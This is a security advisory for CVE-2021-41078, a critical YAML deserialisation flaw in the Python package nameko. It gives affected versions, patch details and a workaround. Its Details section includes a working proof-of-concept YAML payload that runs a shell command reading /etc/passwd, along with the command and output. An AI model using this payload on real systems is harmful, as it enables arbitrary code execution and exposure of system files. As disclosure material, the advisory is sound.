CVE-2021-41078 – nameko

Package

Manager: pip
Name: nameko
Vulnerable Version: >=0 <2.14.0 || >=3.0.0rc0 <3.0.0rc10

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.01473 pctl0.80207

Details

Nameko Arbitrary code execution due to YAML deserialization ### Impact Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example: ``` yaml # malicious.yaml !!python/object/new:type args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] listitems: "__import__('os').system('cat /etc/passwd')" ``` ``` shell $ nameko run --config malicious.yaml test root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin ... ``` ### Patches The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release. Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable. ### Workarounds The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.

Metadata

Created: 2021-10-19T15:28:57Z
Modified: 2024-10-07T14:45:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/10/GHSA-6p52-jr3q-c94g/GHSA-6p52-jr3q-c94g.json
CWE IDs: ["CWE-502"]
Alternative ID: GHSA-6p52-jr3q-c94g
Finding: F096
Auto approve: 1